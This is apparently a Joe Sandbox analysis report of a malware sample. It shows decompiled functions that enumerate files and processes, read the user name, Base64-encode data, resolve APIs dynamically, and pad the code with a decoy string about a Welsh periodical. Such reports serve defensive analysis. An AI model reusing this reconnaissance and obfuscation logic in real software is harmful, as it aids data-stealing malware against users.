Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

FindFirstFileA.KERNEL32(?,?,\*.*,00411BE1,004091B0,?,?), ref: 00408748
StrCmpCA.SHLWAPI(?,00411BF0,?,?), ref: 00408765
StrCmpCA.SHLWAPI(?,00411BF4,?,?), ref: 0040877F

Strings

\*.*, xrefs: 0040870B

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: \*.*
API String ID: 2567437900-1173974218
Opcode ID: aa6698221bff9a9e98a3f42a18b27c85c8a58d473a9f0799ab626b1d4fd58d59
Instruction ID: 08c5e1a01c9fb27898b7b21e33b68bb87ae15c6b3dbf22ddf3859b52da04861f
Opcode Fuzzy Hash: aa6698221bff9a9e98a3f42a18b27c85c8a58d473a9f0799ab626b1d4fd58d59
Instruction Fuzzy Hash: BCF1FF32D00119DBCF10FBA6DD426CDB779AF04308F4145BBE919B7162DB786E868B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED7B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ED7B(void* __edi, void* __eflags) {
				char _v16;
				char _v28;
				char _v288;
				void* _v324;
				void* __esi;
				void* _t10;
				int _t12;
				int _t16;
				void* _t28;
				void* _t29;
				void* _t30;

				_t30 = __edi;
				E004100ED(__edi, __eflags, 0x411be1);
				_v324 = 0x128;
				_t10 = CreateToolhelp32Snapshot(2, 0); // executed
				_t28 = _t10;
				_t12 = Process32First(_t28,  &_v324); // executed
				if(_t12 != 0) {
					while(1) {
						_t16 = Process32Next(_t28,  &_v324); // executed
						if(_t16 == 0) {
							goto L4;
						}
						_t3 =  &_v28; // 0x414044
						E0041018C(E00410208(_t30, _t29, _t3, __eflags, "\n\t"), _t29, _t30);
						_t4 =  &_v28; // 0x414044
						E00401859( *_t4);
						_t6 =  &_v16; // 0x414044
						E0041018C(E00410208(_t30, _t29, _t6, __eflags,  &_v288), _t29, _t30);
						_t7 =  &_v16; // 0x414044
						E00401859( *_t7);
					}
				}
				L4:
				FindCloseChangeNotification(_t28); // executed
				return _t30;
			}

0x0040ed7b
0x0040ed8d
0x0040ed96
0x0040eda0
0x0040eda6
0x0040edb0
0x0040edb8
0x0040edfa
0x0040ee02
0x0040ee0a
0x00000000
0x00000000
0x0040edc1
0x0040edcd
0x0040edd2
0x0040edd5
0x0040ede1
0x0040eded
0x0040edf2
0x0040edf5
0x0040edf5
0x0040edfa
0x0040ee0c
0x0040ee0d
0x0040ee18

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EDA0
Process32First.KERNEL32(00000000,00000128), ref: 0040EDB0
Process32Next.KERNEL32(00000000,00000128), ref: 0040EE02
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040EE0D

Strings

D@AD@AD@AD@AD@A, xrefs: 0040EDC1, 0040EDD2

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcpy
String ID: D@AD@AD@AD@AD@A
API String ID: 2551335554-60785031
Opcode ID: fc14c8540e952e8784dcc0705b2ecf0f3693d128e745d7f6815d1d336f60c5c0
Instruction ID: a9523b410989547dba010031bac90e0071d20611a7a8b92276dc26e618ab0dc6
Opcode Fuzzy Hash: fc14c8540e952e8784dcc0705b2ecf0f3693d128e745d7f6815d1d336f60c5c0
Instruction Fuzzy Hash: 1F01B531A00218A7D721B7668C8ABEEB76CEF48304F0441A7FA16B3191DBBC9D8547D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F02C Relevance: 6.0, APIs: 4, Instructions: 50
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F02C(void* __ecx, DWORD* __esi, char** _a4, BYTE* _a8, int _a12) {
				signed int _v8;
				void* _v12;
				signed int _t15;
				char* _t17;
				char** _t28;

				if(_a8 != 0) {
					if(CryptBinaryToStringA(_a8, _a12, 0x40000001, 0, __esi) == 0) {
						L4:
						_t15 = 0;
					} else {
						_t17 = RtlAllocateHeap(GetProcessHeap(), 0,  *__esi); // executed
						_t28 = _a4;
						 *_t28 = _t17;
						if(_t17 != 0) {
							_v8 =  *__esi;
							_v12 = _t17;
							memset(_v12, 0, _v8 << 0);
							_t15 = CryptBinaryToStringA(_a8, _a12, 0x40000001,  *_t28, __esi) & 0xffffff00 | _t20 != 0x00000000;
						} else {
							goto L4;
						}
					}
				} else {
					_t15 = 0;
				}
				return _t15;
			}

0x0040f037
0x0040f054
0x0040f06f
0x0040f06f
0x0040f056
0x0040f060
0x0040f066
0x0040f069
0x0040f06d
0x0040f075
0x0040f078
0x0040f083
0x0040f097
0x00000000
0x00000000
0x00000000
0x0040f06d
0x0040f039
0x0040f039
0x0040f039
0x0040f09d

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040F04C
GetProcessHeap.KERNEL32(00000000,?,?,00403FE7,?,?,?,?,?,?,?), ref: 0040F059
RtlAllocateHeap.NTDLL(00000000,?,00403FE7), ref: 0040F060

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Heap$AllocateBinaryCryptProcessString
String ID:
API String ID: 869800140-0
Opcode ID: 01d172871f19914b2c583745b665e8e64e3f83b7008c7362ca79a16edc85c9af
Instruction ID: 5960bf36821657f2d0115d5cc0a431a07f4b6cf0d43d64dcdb68e0a7ee830dac
Opcode Fuzzy Hash: 01d172871f19914b2c583745b665e8e64e3f83b7008c7362ca79a16edc85c9af
Instruction Fuzzy Hash: 53011E70500208FFDF218F61DC458ABBBBEFF893A4B14847AF50693261E7359951EB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8AD Relevance: 4.5, APIs: 3, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E8AD(void* __ecx) {
				long _v8;
				CHAR* _t10;

				_t10 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v8 = 0x104;
				GetUserNameA(_t10,  &_v8); // executed
				return _t10;
			}

0x0040e8c6
0x0040e8cd
0x0040e8d4
0x0040e8de

APIs

GetProcessHeap.KERNEL32(00000000,00000104,76636410,?,?,004010CA,0040E259), ref: 0040E8B9
RtlAllocateHeap.NTDLL(00000000), ref: 0040E8C0
GetUserNameA.ADVAPI32(00000000,?), ref: 0040E8D4

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 8926dbd3751c2cd87388bd87878c3e75a03d8829557900df050af06935d374a0
Instruction ID: 5dc7ce85eaf6bc6f01ccf08c45f9e70cf92048204c1a01388127b5310a876f9f
Opcode Fuzzy Hash: 8926dbd3751c2cd87388bd87878c3e75a03d8829557900df050af06935d374a0
Instruction Fuzzy Hash: 33D017B6200208FFEB009B95DC0EECEBAADDBC4715F089156BA02D22A0DAB099008660

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA76 Relevance: 422.8, APIs: 228, Strings: 13, Instructions: 1072
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			_entry_() {
				char _v2080;
				char* _t59;
				void* _t60;
				void* _t67;

				memset( &_v2080, 0, 0x7d0);
				strcat( &_v2080, "The");
				strcat( &_v2080, "Greal");
				strcat( &_v2080, "(Llangollen)");
				strcat( &_v2080, "was");
				strcat( &_v2080, "a");
				strcat( &_v2080, "19th-century");
				strcat( &_v2080, "Welsh-language");
				strcat( &_v2080, "periodical");
				strcat( &_v2080, "first");
				strcat( &_v2080, "published");
				strcat( &_v2080, "by");
				strcat( &_v2080, "William");
				strcat( &_v2080, "Williams");
				_t59 = "in";
				strcat( &_v2080, _t59);
				strcat( &_v2080, "Llangollen");
				strcat( &_v2080, _t59);
				strcat( &_v2080, "1852");
				if(_t67 != 0 && _t67 == 0) {
				}
				E00401C50(_t60);
				_push("The");
			}

0x0040da90
0x0040daa8
0x0040dab6
0x0040dac4
0x0040dad2
0x0040dae0
0x0040daee
0x0040dafc
0x0040db0d
0x0040db1b
0x0040db29
0x0040db37
0x0040db45
0x0040db53
0x0040db55
0x0040db62
0x0040db70
0x0040db7d
0x0040db8c
0x0040db91
0x0040db91
0x0040db96
0x0040dba1

APIs

memset.MSVCRT ref: 0040DA90
strcat.MSVCRT(?,The), ref: 0040DAA8
strcat.MSVCRT(?,Greal), ref: 0040DAB6
strcat.MSVCRT(?,(Llangollen)), ref: 0040DAC4
strcat.MSVCRT(?,was), ref: 0040DAD2
strcat.MSVCRT(?,00411C18), ref: 0040DAE0
strcat.MSVCRT(?,19th-century), ref: 0040DAEE
strcat.MSVCRT(?,Welsh-language), ref: 0040DAFC
strcat.MSVCRT(?,periodical), ref: 0040DB0D
strcat.MSVCRT(?,first), ref: 0040DB1B
strcat.MSVCRT(?,published), ref: 0040DB29
strcat.MSVCRT(?,00411C5C), ref: 0040DB37
strcat.MSVCRT(?,William), ref: 0040DB45
strcat.MSVCRT(?,Williams), ref: 0040DB53
strcat.MSVCRT(?,00411C74), ref: 0040DB62
strcat.MSVCRT(?,Llangollen), ref: 0040DB70
strcat.MSVCRT(?,00411C74), ref: 0040DB7D
strcat.MSVCRT(?,1852), ref: 0040DB8C
strcat.MSVCRT(?,The), ref: 0040DBA7
strcat.MSVCRT(?,Greal), ref: 0040DBB5
strcat.MSVCRT(?,(Llangollen)), ref: 0040DBC3
strcat.MSVCRT(?,was), ref: 0040DBD1
strcat.MSVCRT(?,00411C18), ref: 0040DBDF
strcat.MSVCRT(?,19th-century), ref: 0040DBED
strcat.MSVCRT(?,Welsh-language), ref: 0040DBFB
strcat.MSVCRT(?,periodical), ref: 0040DC09
strcat.MSVCRT(?,first), ref: 0040DC1A
strcat.MSVCRT(?,published), ref: 0040DC28
strcat.MSVCRT(?,00411C5C), ref: 0040DC36
strcat.MSVCRT(?,William), ref: 0040DC44
strcat.MSVCRT(?,Williams), ref: 0040DC52
strcat.MSVCRT(?,00411C74), ref: 0040DC5C
strcat.MSVCRT(?,Llangollen), ref: 0040DC6A
strcat.MSVCRT(?,00411C74), ref: 0040DC74
strcat.MSVCRT(?,1852), ref: 0040DC81

Strings

first, xrefs: 0040DB15, 0040DC14, 0040DD08, 0040DDFF, 0040DF02, 0040DFF6, 0040E0E4, 0040E1DE, 0040E2D2, 0040E3C6, 0040E55C, 0040E655, 0040E749
Llangollen, xrefs: 0040DB6A, 0040DC64, 0040DD58, 0040DE4F, 0040DF52, 0040E046, 0040E13A, 0040E22E, 0040E322, 0040E410, 0040E5AC, 0040E6A5, 0040E799
periodical, xrefs: 0040DB07, 0040DC03, 0040DCF7, 0040DDEE, 0040DEF1, 0040DFE5, 0040E0D9, 0040E1CD, 0040E2C1, 0040E3B5, 0040E54B, 0040E644, 0040E738
William, xrefs: 0040DB3F, 0040DC3E, 0040DD32, 0040DE29, 0040DF2C, 0040E020, 0040E114, 0040E208, 0040E2FC, 0040E3F0, 0040E586, 0040E67F, 0040E773
(Llangollen), xrefs: 0040DABE, 0040DBBD, 0040DCB1, 0040DDA8, 0040DEAB, 0040DF9F, 0040E093, 0040E187, 0040E27B, 0040E36F, 0040E505, 0040E5FE, 0040E6EC
19th-century, xrefs: 0040DAE8, 0040DBE7, 0040DCDB, 0040DDD2, 0040DED5, 0040DFC9, 0040E0BD, 0040E1B1, 0040E2A5, 0040E399, 0040E52F, 0040E628, 0040E71C
1852, xrefs: 0040DB7F, 0040DB8A, 0040DC7F, 0040DD73, 0040DE64, 0040DE6F, 0040DF6D, 0040E061, 0040E155, 0040E249, 0040E33D, 0040E431, 0040E5C1, 0040E5CC, 0040E6C0, 0040E7B4
The, xrefs: 0040DAA2, 0040DBA1, 0040DC95, 0040DD8C, 0040DE8F, 0040DF83, 0040E077, 0040E16B, 0040E25F, 0040E353, 0040E4E9, 0040E5DC, 0040E6D6
Welsh-language, xrefs: 0040DAF6, 0040DBF5, 0040DCE9, 0040DDE0, 0040DEE3, 0040DFD1, 0040E0CB, 0040E1BF, 0040E2B3, 0040E3A7, 0040E53D, 0040E636, 0040E72A
published, xrefs: 0040DB23, 0040DC22, 0040DD16, 0040DE0D, 0040DF10, 0040E004, 0040E0F8, 0040E1EC, 0040E2E0, 0040E3D4, 0040E56A, 0040E663, 0040E757
Williams, xrefs: 0040DB4D, 0040DC4C, 0040DD40, 0040DE37, 0040DF3A, 0040E02E, 0040E122, 0040E216, 0040E304, 0040E3FE, 0040E594, 0040E68D, 0040E781
Greal, xrefs: 0040DAB0, 0040DBAF, 0040DC9D, 0040DD9A, 0040DE9D, 0040DF91, 0040E085, 0040E179, 0040E26D, 0040E361, 0040E4F7, 0040E5F0, 0040E6E4
was, xrefs: 0040DACC, 0040DBCB, 0040DCBF, 0040DDB6, 0040DEB9, 0040DFAD, 0040E0A1, 0040E195, 0040E289, 0040E37D, 0040E513, 0040E60C, 0040E700

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat$memset
String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$The$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 3737753769-3789696708
Opcode ID: e246480dcfc9b6746d25ffe15cc96db74721f7b7108a7286a19c2809fc2db02a
Instruction ID: 124ba4ce97c98140768fac9cdf2370cee47eed7d9347ef880eee442d0a579752
Opcode Fuzzy Hash: e246480dcfc9b6746d25ffe15cc96db74721f7b7108a7286a19c2809fc2db02a
Instruction Fuzzy Hash: 54728FB6DC021C6ACB20B7A49D45ECE73FCAF54700F11C5B2F645E2055EA789A878FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7A8 Relevance: 153.4, APIs: 102, Instructions: 438
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040F7A8() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t10;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;

				_t1 =  *0x615798; // 0x76670000
				if(_t1 != 0) {
					 *0x61565c = GetProcAddress(_t1,  *0x6154c0);
					 *0x6156d4 = GetProcAddress( *0x615798,  *0x61511c);
					 *0x615638 = GetProcAddress( *0x615798,  *0x6150d0);
					 *0x6157d0 = GetProcAddress( *0x615798,  *0x615104);
					 *0x6157b8 = GetProcAddress( *0x615798,  *0x615464);
					 *0x6155e4 = GetProcAddress( *0x615798,  *0x615130);
					 *0x615790 = GetProcAddress( *0x615798,  *0x6152dc);
					 *0x615778 = GetProcAddress( *0x615798,  *0x6150a4);
					 *0x6156f8 = GetProcAddress( *0x615798,  *0x615120);
					 *0x6156f4 = GetProcAddress( *0x615798,  *0x615164);
					 *0x6157f0 = GetProcAddress( *0x615798,  *0x615270);
					 *0x6157d4 = GetProcAddress( *0x615798,  *0x61551c);
					 *0x6155f0 = GetProcAddress( *0x615798,  *0x615228);
					 *0x6155d8 = GetProcAddress( *0x615798,  *0x6152d8);
					 *0x61566c = GetProcAddress( *0x615798,  *0x615468);
					 *0x615644 = GetProcAddress( *0x615798,  *0x6150ec);
					 *0x615658 = GetProcAddress( *0x615798,  *0x61532c);
					 *0x615678 = GetProcAddress( *0x615798,  *0x615430);
					 *0x615698 = GetProcAddress( *0x615798,  *0x61542c);
					 *0x615688 = GetProcAddress( *0x615798,  *0x615020);
					 *0x61569c = GetProcAddress( *0x615798,  *0x615410);
					 *0x6157e4 = GetProcAddress( *0x615798,  *0x615094);
					 *0x61561c = GetProcAddress( *0x615798,  *0x6151a0);
					 *0x615620 = GetProcAddress( *0x615798,  *0x61544c);
					 *0x615710 = GetProcAddress( *0x615798,  *0x6150e4);
					 *0x6155e8 = GetProcAddress( *0x615798,  *0x6153c8);
					 *0x615720 = GetProcAddress( *0x615798,  *0x61553c);
					 *0x61563c = GetProcAddress( *0x615798,  *0x615390);
					 *0x615684 = GetProcAddress( *0x615798,  *0x615414);
					 *0x615624 = GetProcAddress( *0x615798,  *0x61547c);
					 *0x6157f4 = GetProcAddress( *0x615798,  *0x6153ac);
					 *0x615634 = GetProcAddress( *0x615798,  *0x6152a8);
					 *0x615640 = GetProcAddress( *0x615798,  *0x6152f4);
					 *0x6155ec = GetProcAddress( *0x615798,  *0x615008);
					 *0x615730 = GetProcAddress( *0x615798,  *0x615368);
					 *0x6156f0 = GetProcAddress( *0x615798,  *0x6152b4);
					 *0x615610 = GetProcAddress( *0x615798,  *0x61549c);
					 *0x6157a4 = GetProcAddress( *0x615798,  *0x6151e8);
					 *0x615700 = GetProcAddress( *0x615798,  *0x6152e8);
					 *0x615724 = GetProcAddress( *0x615798,  *0x615320);
					 *0x615754 = GetProcAddress( *0x615798,  *0x615358);
				}
				_t2 = LoadLibraryA( *0x615298); // executed
				 *0x6156a4 = _t2; // executed
				_t3 = LoadLibraryA( *0x6154bc); // executed
				 *0x6156dc = _t3; // executed
				_t4 = LoadLibraryA( *0x615234); // executed
				 *0x61576c = _t4; // executed
				_t5 = LoadLibraryA( *0x61520c); // executed
				 *0x61564c = _t5; // executed
				_t6 = LoadLibraryA( *0x615418); // executed
				 *0x6156d0 = _t6; // executed
				_t7 = LoadLibraryA( *0x615160); // executed
				 *0x6157c0 = _t7; // executed
				_t8 = LoadLibraryA( *0x615174); // executed
				 *0x6156b4 = _t8;
				_t9 =  *0x6156e8; // 0x76130000
				if(_t9 != 0) {
					 *0x61562c = GetProcAddress(_t9,  *0x6151b4);
					 *0x615614 = GetProcAddress( *0x6156e8,  *0x615448);
					 *0x6155fc = GetProcAddress( *0x6156e8,  *0x6151f4);
					 *0x615770 = GetProcAddress( *0x6156e8,  *0x615428);
					 *0x6156b0 = GetProcAddress( *0x6156e8,  *0x615518);
				}
				_t10 =  *0x6156a4; // 0x729c0000
				if(_t10 != 0) {
					 *0x615650 = GetProcAddress(_t10,  *0x6152cc);
					 *0x615694 = GetProcAddress( *0x6156a4,  *0x6151c8);
					 *0x615738 = GetProcAddress( *0x6156a4,  *0x615224);
					 *0x615768 = GetProcAddress( *0x6156a4,  *0x6150f4);
					 *0x615750 = GetProcAddress( *0x6156a4,  *0x615384);
					 *0x615708 = GetProcAddress( *0x6156a4,  *0x615540);
					 *0x615668 = GetProcAddress( *0x6156a4,  *0x615290);
					 *0x6157b0 = GetProcAddress( *0x6156a4,  *0x615538);
				}
				_t11 =  *0x6156dc; // 0x75ec0000
				if(_t11 != 0) {
					 *0x615604 = GetProcAddress(_t11,  *0x6152d4);
					 *0x6156ec = GetProcAddress( *0x6156dc,  *0x61510c);
					 *0x615764 = GetProcAddress( *0x6156dc,  *0x615230);
					 *0x61577c = GetProcAddress( *0x6156dc,  *0x6154fc);
					 *0x615648 = GetProcAddress( *0x6156dc,  *0x615374);
				}
				_t12 =  *0x61576c; // 0x731b0000
				if(_t12 != 0) {
					 *0x615630 = GetProcAddress(_t12,  *0x6153a8);
					 *0x6156c4 = GetProcAddress( *0x61576c,  *0x6150b8);
					 *0x615794 = GetProcAddress( *0x61576c,  *0x61506c);
					 *0x615654 = GetProcAddress( *0x61576c,  *0x615264);
					 *0x615758 = GetProcAddress( *0x61576c,  *0x6154e0);
					 *0x615674 = GetProcAddress( *0x61576c,  *0x615398);
				}
				_t13 =  *0x6157cc; // 0x762b0000
				if(_t13 != 0) {
					 *0x6157e0 = GetProcAddress(_t13,  *0x61528c);
					 *0x6155f8 = GetProcAddress( *0x6157cc,  *0x615440);
					 *0x6157c8 = GetProcAddress( *0x6157cc,  *0x615460);
					 *0x6157bc = GetProcAddress( *0x6157cc,  *0x615294);
					 *0x6155f4 = GetProcAddress( *0x6157cc,  *0x61522c);
					 *0x615740 = GetProcAddress( *0x6157cc,  *0x6153a4);
					 *0x615734 = GetProcAddress( *0x6157cc,  *0x615438);
					 *0x6156fc = GetProcAddress( *0x6157cc,  *0x61545c);
				}
				_t14 =  *0x6155dc; // 0x76170000
				if(_t14 != 0) {
					 *0x615690 = GetProcAddress(_t14,  *0x6153bc);
					 *0x6157a0 = GetProcAddress( *0x6155dc,  *0x61516c);
					 *0x6156a8 = GetProcAddress( *0x6155dc,  *0x6154b0);
					 *0x615718 = GetProcAddress( *0x6155dc,  *0x615118);
					 *0x6157dc = GetProcAddress( *0x6155dc,  *0x615554);
				}
				_t15 =  *0x6156a0; // 0x76b00000
				if(_t15 != 0) {
					 *0x6155e0 = GetProcAddress(_t15,  *0x6150e0);
					 *0x61568c = GetProcAddress( *0x6156a0,  *0x615254);
				}
				_t16 =  *0x6157c0; // 0x73970000
				if(_t16 != 0) {
					 *0x615744 = GetProcAddress(_t16,  *0x6151b0);
					 *0x6157b4 = GetProcAddress( *0x6157c0,  *0x615284);
				}
				_t17 =  *0x61564c; // 0x6e980000
				if(_t17 != 0) {
					 *0x6156c0 = GetProcAddress(_t17,  *0x6151ac);
					 *0x6157a8 = GetProcAddress( *0x61564c,  *0x615198);
					 *0x6156b8 = GetProcAddress( *0x61564c,  *0x615190);
					 *0x6156bc = GetProcAddress( *0x61564c,  *0x615354);
					 *0x615774 = GetProcAddress( *0x61564c,  *0x6153cc);
					 *0x6157d8 = GetProcAddress( *0x61564c,  *0x6153b0);
					 *0x6156e0 = GetProcAddress( *0x61564c,  *0x6153d0);
					 *0x615664 = GetProcAddress( *0x61564c,  *0x6154d8);
				}
				_t18 =  *0x6156d0; // 0x76cd0000
				if(_t18 != 0) {
					 *0x615784 = GetProcAddress(_t18,  *0x615114);
					 *0x615618 = GetProcAddress( *0x6156d0,  *0x615490);
					 *0x61572c = GetProcAddress( *0x6156d0,  *0x615194);
					 *0x615680 = GetProcAddress( *0x6156d0,  *0x61509c);
				}
				_t19 =  *0x6156b4; // 0x75750000
				if(_t19 != 0) {
					_t20 = GetProcAddress(_t19,  *0x6152a4);
					 *0x615780 = _t20;
					return _t20;
				}
				return _t19;
			}

0x0040f7a8
0x0040f7af
0x0040f7c8
0x0040f7df
0x0040f7f6
0x0040f80d
0x0040f824
0x0040f83b
0x0040f852
0x0040f869
0x0040f880
0x0040f897
0x0040f8ae
0x0040f8c5
0x0040f8dc
0x0040f8f3
0x0040f90a
0x0040f921
0x0040f938
0x0040f94f
0x0040f966
0x0040f97d
0x0040f994
0x0040f9ab
0x0040f9c2
0x0040f9d9
0x0040f9f0
0x0040fa07
0x0040fa1e
0x0040fa35
0x0040fa4c
0x0040fa63
0x0040fa7a
0x0040fa91
0x0040faa8
0x0040fabf
0x0040fad6
0x0040faed
0x0040fb04
0x0040fb1b
0x0040fb32
0x0040fb49
0x0040fb5a
0x0040fb5a
0x0040fb65
0x0040fb71
0x0040fb76
0x0040fb82
0x0040fb87
0x0040fb93
0x0040fb98
0x0040fba4
0x0040fba9
0x0040fbb5
0x0040fbba
0x0040fbc6
0x0040fbcb
0x0040fbd1
0x0040fbd6
0x0040fbdd
0x0040fbf2
0x0040fc09
0x0040fc20
0x0040fc37
0x0040fc48
0x0040fc48
0x0040fc4d
0x0040fc54
0x0040fc6d
0x0040fc84
0x0040fc9b
0x0040fcb2
0x0040fcc9
0x0040fce0
0x0040fcf7
0x0040fd08
0x0040fd08
0x0040fd0d
0x0040fd14
0x0040fd29
0x0040fd40
0x0040fd57
0x0040fd6e
0x0040fd7f
0x0040fd7f
0x0040fd84
0x0040fd8b
0x0040fda4
0x0040fdbb
0x0040fdd2
0x0040fde9
0x0040fe00
0x0040fe11
0x0040fe11
0x0040fe16
0x0040fe1d
0x0040fe36
0x0040fe4d
0x0040fe64
0x0040fe7b
0x0040fe92
0x0040fea9
0x0040fec0
0x0040fed1
0x0040fed1
0x0040fed6
0x0040fedd
0x0040fef2
0x0040ff09
0x0040ff20
0x0040ff37
0x0040ff48
0x0040ff48
0x0040ff4d
0x0040ff54
0x0040ff69
0x0040ff7a
0x0040ff7a
0x0040ff7f
0x0040ff86
0x0040ff9b
0x0040ffac
0x0040ffac
0x0040ffb1
0x0040ffb8
0x0040ffd1
0x0040ffe8
0x0040ffff
0x00410016
0x0041002d
0x00410044
0x0041005b
0x0041006c
0x0041006c
0x00410071
0x00410078
0x0041008d
0x004100a4
0x004100bb
0x004100cc
0x004100cc
0x004100d1
0x004100d8
0x004100e1
0x004100e7
0x00000000
0x004100e7
0x004100ec

APIs

GetProcAddress.KERNEL32(76670000,0040D374), ref: 0040F7BC
GetProcAddress.KERNEL32 ref: 0040F7D3
GetProcAddress.KERNEL32 ref: 0040F7EA
GetProcAddress.KERNEL32 ref: 0040F801
GetProcAddress.KERNEL32 ref: 0040F818
GetProcAddress.KERNEL32 ref: 0040F82F
GetProcAddress.KERNEL32 ref: 0040F846
GetProcAddress.KERNEL32 ref: 0040F85D
GetProcAddress.KERNEL32 ref: 0040F874
GetProcAddress.KERNEL32 ref: 0040F88B
